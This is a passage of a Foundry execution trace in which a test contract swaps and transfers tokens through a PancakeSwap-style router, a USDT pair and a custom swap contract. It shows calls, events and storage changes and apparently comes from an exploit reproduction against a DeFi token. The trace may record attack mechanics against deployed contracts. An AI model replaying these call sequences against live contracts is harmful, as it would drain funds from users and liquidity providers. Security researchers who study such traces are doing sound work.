    │   │   │   │   │   │   ├─ [14503] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::transferFrom(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, 1348546366704405578902 [1.348e21])
    │   │   │   │   │   │   │   ├─ [465] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::token0() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025
    │   │   │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2375652937848065235514358 [2.375e24], 2704875615966657610504978 [2.704e24], 1669888304 [1.669e9]
    │   │   │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2375652937848065235514358 [2.375e24]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, to: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, value: 1348546366704405578902 [1.348e21])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 2610904785645853302 [2.61e18])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x00000000000000000000000000000000000000000001f7106760601b5eb673f6 → 0x00000000000000000000000000000000000000000001f75982377fb83e78788c
    │   │   │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x000000000000000000000000000000000000000000000088bad66a9fc7f457c9 → 0x00000000000000000000000000000000000000000000003f9fff4b02e8325333
    │   │   │   │   │   │   │   │   @ 0x41c1cac03a0930a470a3759d68699d5551621f70c543fe08cc3b02b92e3dafce: 0x0000000000000000000000000000000000000000000000493f12ebaea28bdf0c → 0x000000000000000000000000000000000000000000000000243bcc11c2c9da76
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, 1535430586760422854544 [1.535e21])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, to: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, value: 1535430586760422854544 [1.535e21])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x00000000000000000000000000000000000000000000012406adfb7a25978f90 → 0x0000000000000000000000000000000000000000000000d0ca4cbbe0e0fe0000
    │   │   │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x000000000000000000000000000000000000000000023cc799d84c75f927db12 → 0x000000000000000000000000000000000000000000023d1ad6398c0f3dc16aa2
    │   │   │   │   │   │   │   │   @ 0x41c1cac03a0930a470a3759d68699d5551621f70c543fe08cc3b02b92e3dafce: 0x0000000000000000000000000000000000000000000000533c613f9944998f90 → 0
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [60794] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::mint(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025)
    │   │   │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2377001484214769641093260 [2.377e24]
    │   │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2706411046553418033359522 [2.706e24]
    │   │   │   │   │   │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 175999936503465962513 [1.759e20])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, value: 1341084452968914412578 [1.341e21])
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 2377001484214769641093260 [2.377e24], reserve1: 2706411046553418033359522 [2.706e24])
    │   │   │   │   │   │   │   ├─ emit Mint(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 1348546366704405578902 [1.348e21], amount1: 1535430586760422854544 [1.535e21])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x00000000000000000000000000000000000000000000210ce5cbe61fce62b343 → 0x0000000000000000000000000000000000000000000021559914fabac1959765
    │   │   │   │   │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000001f43e42886bd958515493 → 0x00000000000000000000000000000000000000000001f490804ee2376fe924c6
    │   │   │   │   │   │   │   │   @ 11: 0x000000000000000000000004650abd8656f5f63db4e5d58625ff47c9bd6125d2 → 0x00000000000000000000000466d81cc36badaa8b0d91719afcf28a35a7b24098
    │   │   │   │   │   │   │   │   @ 8: 0x63887930000000023cc799d84c75f927db1200000001f7106760601b5eb673f6 → 0x63887930000000023d1ad6398c0f3dc16aa200000001f75982377fb83e78788c
    │   │   │   │   │   │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x00000000000000000000000000000000000000000000004cfb5a8429ad1cdce6 → 0x00000000000000000000000000000000000000000000005685d7e5ecd181c8f7
    │   │   │   │   │   │   │   └─ ← [Return] 1341084452968914412578 [1.341e21]
    │   │   │   │   │   │   └─ ← [Return] 1348546366704405578902 [1.348e21], 1535430586760422854544 [1.535e21], 1341084452968914412578 [1.341e21]
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x5a88114F02bfFb04a9A13a776f592547B3080237, value: 100000000000000000000000 [1e23])
    │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x5a88114F02bfFb04a9A13a776f592547B3080237, value: 115792089237316195423570985008687907853269984665640563939457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x41c1cac03a0930a470a3759d68699d5551621f70c543fe08cc3b02b92e3dafce: 0x0000000000000000000000000000000000000000000000000070d2dc9bf78eeb → 0x0000000000000000000000000000000000000000000000533c613f9944998f90
    │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   │   @ 0x6961c91e0e1ce81436fde2fd79d2f70f4e7b89cd6c8dd58d553d8ad616274406: 0x000000000000000000000000000000000000000c9f2c73dd8a52eb98bd2eee8a → 0x000000000000000000000000000000000000000c9f2c738a4df1abff78955efa
    │   │   │   │   │   │   @ 19: 0x0000000000000000000000000000000000000000000000927e25d75d4517be18 → 0
    │   │   │   │   │   │   @ 0x95e76b7acba54050619e6b5210bc5b576b2b169a113311897f5343545716a460: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffead2fd381eb5097fffff
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000006f60ba213bf8ca89c0b6 → 0x000000000000000000000000000000000000000000005a33b7595aadd409c0b6
    │   │   │   │   │   │   @ 0x45d200eaad19b383f882e843a6298328f1eede3199198c40c8d09600a1d73bd9: 0x0000000000000000000000000000000000000000000008d946d934735ab60df6 → 0x000000000000000000000000000000000000000000001e0649a115be51360df6
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [30130] 0x473C33C55bE10bB53D81fe45173fcc444143a13e::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 112565616880285973943000 [1.125e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x5a88114F02bfFb04a9A13a776f592547B3080237, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 112565616880285973943000 [1.125e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000017d631beda6be01f12d8
    │   │   │   │   │   │   @ 0x45d200eaad19b383f882e843a6298328f1eede3199198c40c8d09600a1d73bd9: 0x00000000000000000000000000000000000000000000421dca0fb4b2d2af5641 → 0x000000000000000000000000000000000000000000002a479850da46f2904369
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Swap(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, : 0x473C33C55bE10bB53D81fe45173fcc444143a13e, : 100000000000000000000000 [1e23], : 112565616880285973943000 [1.125e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000017d631beda6be01f12d8
    │   │   │   │   │   @ 0x95e76b7acba54050619e6b5210bc5b576b2b169a113311897f5343545716a460: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffead2fd381eb5097fffff
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 425966979096711757676726 [4.259e23]
    │   │   ├─ [72986] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(425966979096711757676726 [4.259e23], 0, [0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1669888304 [1.669e9])
    │   │   │   ├─ [24387] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, 425966979096711757676726 [4.259e23])
    │   │   │   │   ├─ [465] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025
    │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 2377001484214769641093260 [2.377e24], 2706411046553418033359522 [2.706e24], 1669888304 [1.669e9]
    │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2377001484214769641093260 [2.377e24]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, value: 417447639514777522523192 [4.174e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, value: 2129834895483558788383 [2.129e21])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 2129834895483558788383 [2.129e21])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x46989EEc5A978c766F108Fee75c6c12dBFA313Ef, value: 4259669790967117576767 [4.259e21])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640563613490604911201371963209 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x154ed8d3d46f6828e5e29dbb341cabc8d0d90d2faa1e11d330d8b794e667e477: 0x0000000000000000000000000000000000000000000059cd58c81078dc77340a → 0x000000000000000000000000000000000000000000005ab4439332a8adf22e49
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000005a33b7595aadd409c0b6 → 0
    │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x00000000000000000000000000000000000000000000003f9fff4b02e8325333 → 0x0000000000000000000000000000000000000000000000b31564dc1ad0efd052
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffa5cc48a6a5522bf63f49
    │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x00000000000000000000000000000000000000000001f75982377fb83e78788c → 0x000000000000000000000000000000000000000000024fbf63fa96066f8c44c4
    │   │   │   │   │   @ 19: 0 → 0x00000000000000000000000000000000000000000000007375659117e8bd7d1f
    │   │   │   │   │   @ 0xa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb49: 0x00000000000000000000000000000000000000000000527cf7c0c4f8833e3c8d → 0x0000000000000000000000000000000000000000000052f06d2656106bfbb9ac
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 2377001484214769641093260 [2.377e24], 2706411046553418033359522 [2.706e24], 1669888304 [1.669e9]
    │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   └─ ← [Return] 2794449123729547163616452 [2.794e24]
    │   │   │   ├─ [38616] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::swap(0, 403436034909674363294289 [4.034e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [23171] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 403436034909674363294289 [4.034e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 403436034909674363294289 [4.034e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x000000000000000000000000000000000000000000023d1ad6398c0f3dc16aa2 → 0x00000000000000000000000000000000000000000001e7ac8689cd6ebdeb5851
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000556e4fafbea07fd61251
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2794449123729547163616452 [2.794e24]
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2302975011643743670065233 [2.302e24]
    │   │   │   │   ├─ emit Sync(reserve0: 2794449123729547163616452 [2.794e24], reserve1: 2302975011643743670065233 [2.302e24])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 417447639514777522523192 [4.174e23], amount1In: 0, amount0Out: 0, amount1Out: 403436034909674363294289 [4.034e23], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x63887930000000023d1ad6398c0f3dc16aa200000001f75982377fb83e78788c → 0x6388793000000001e7ac8689cd6ebdeb5851000000024fbf63fa96066f8c44c4
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 403436034909674363294289 [4.034e23]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [585] 0x473C33C55bE10bB53D81fe45173fcc444143a13e::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 112565616880285973943000 [1.125e23]
    │   │   ├─ [232119] 0x5a88114F02bfFb04a9A13a776f592547B3080237::swap(0x473C33C55bE10bB53D81fe45173fcc444143a13e, 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 112565616880285973943000 [1.125e23])
    │   │   │   ├─ [231282] 0xc6Fc79db585BF2cC613913F3c24B999a676944Ac::swap(0x473C33C55bE10bB53D81fe45173fcc444143a13e, 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 112565616880285973943000 [1.125e23]) [delegatecall]
    │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 2794449123729547163616452 [2.794e24], 2302975011643743670065233 [2.302e24], 1669888304 [1.669e9]
    │   │   │   │   ├─ [1021] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountOut(1000000000000000000 [1e18], 2794449123729547163616452 [2.794e24], 2302975011643743670065233 [2.302e24]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 822064261109039774 [8.22e17]
    │   │   │   │   ├─ [6272] 0x473C33C55bE10bB53D81fe45173fcc444143a13e::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x5a88114F02bfFb04a9A13a776f592547B3080237, 112565616880285973943000 [1.125e23])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x5a88114F02bfFb04a9A13a776f592547B3080237, value: 112565616880285973943000 [1.125e23])
    │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x5a88114F02bfFb04a9A13a776f592547B3080237, value: 115792089237316195423570985008687907853269984665640563926891967127627155696935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x95e76b7acba54050619e6b5210bc5b576b2b169a113311897f5343545716a460: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffe829ce4125941fe0ed27
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000017d631beda6be01f12d8 → 0
    │   │   │   │   │   │   @ 0x45d200eaad19b383f882e843a6298328f1eede3199198c40c8d09600a1d73bd9: 0x000000000000000000000000000000000000000000002a479850da46f2904369 → 0x00000000000000000000000000000000000000000000421dca0fb4b2d2af5641
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [214784] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 135561130660443051608553 [1.355e23])
    │   │   │   │   │   ├─ [465] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::token0() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025
    │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2794449123729547163616452 [2.794e24], 2302975011643743670065233 [2.302e24], 1669888304 [1.669e9]
    │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2794449123729547163616452 [2.794e24]
    │   │   │   │   │   ├─ [439] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2363848818157249549116614 [2.363e24]
    │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 1064917447741779394191 [1.064e21])
    │   │   │   │   │   ├─ [63102] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(1064917447741779394191 [1.064e21], 0, [0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x55d398326f99059fF775485246999027B3197955], 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, 1669888304 [1.669e9])
    │   │   │   │   │   │   ├─ [14503] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::transferFrom(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, 1064917447741779394191 [1.064e21])
    │   │   │   │   │   │   │   ├─ [465] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::token0() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025
    │   │   │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2794449123729547163616452 [2.794e24], 2302975011643743670065233 [2.302e24], 1669888304 [1.669e9]
    │   │   │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2794449123729547163616452 [2.794e24]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, to: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, value: 1064917447741779394191 [1.064e21])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x000000000000000000000000000000000000000000024fbf63fa96066f8c44c4 → 0x000000000000000000000000000000000000000000024ff91ead5e9263eb0353
    │   │   │   │   │   │   │   │   @ 0x41c1cac03a0930a470a3759d68699d5551621f70c543fe08cc3b02b92e3dafce: 0x000000000000000000000000000000000000000000000039bab2c88bf45ebe8f → 0
    │   │   │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x0000000000000000000000000000000000000000000000b31564dc1ad0efd052 → 0x0000000000000000000000000000000000000000000000795ab2138edc9111c3
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 2794449123729547163616452 [2.794e24], 2302975011643743670065233 [2.302e24], 1669888304 [1.669e9]
    │   │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 2795514041177288943010643 [2.795e24]
    │   │   │   │   │   │   ├─ [38616] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::swap(0, 875098235840705856760 [8.75e20], 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, 0x)
    │   │   │   │   │   │   │   ├─ [23171] 0x55d398326f99059fF775485246999027B3197955::transfer(0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, 875098235840705856760 [8.75e20])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, to: 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, value: 875098235840705856760 [8.75e20])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x317a211acee417ea6369bcca994cc5ff96f957ce922197f8f408c7c4caca9c20: 0 → 0x00000000000000000000000000000000000000000000002f706d7907284804f8
    │   │   │   │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x00000000000000000000000000000000000000000001e7ac8689cd6ebdeb5851 → 0x00000000000000000000000000000000000000000001e77d161c546795a35359
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2795514041177288943010643 [2.795e24]
    │   │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2302099913407902964208473 [2.302e24]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 2795514041177288943010643 [2.795e24], reserve1: 2302099913407902964208473 [2.302e24])
    │   │   │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 1064917447741779394191 [1.064e21], amount1In: 0, amount0Out: 0, amount1Out: 875098235840705856760 [8.75e20], to: 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 8: 0x6388793000000001e7ac8689cd6ebdeb5851000000024fbf63fa96066f8c44c4 → 0x6388793000000001e77d161c546795a35359000000024ff91ead5e9263eb0353
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 875098235840705856760 [8.75e20]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 875098235840705856760 [8.75e20]
    │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 1064917447741779394192 [1.064e21])
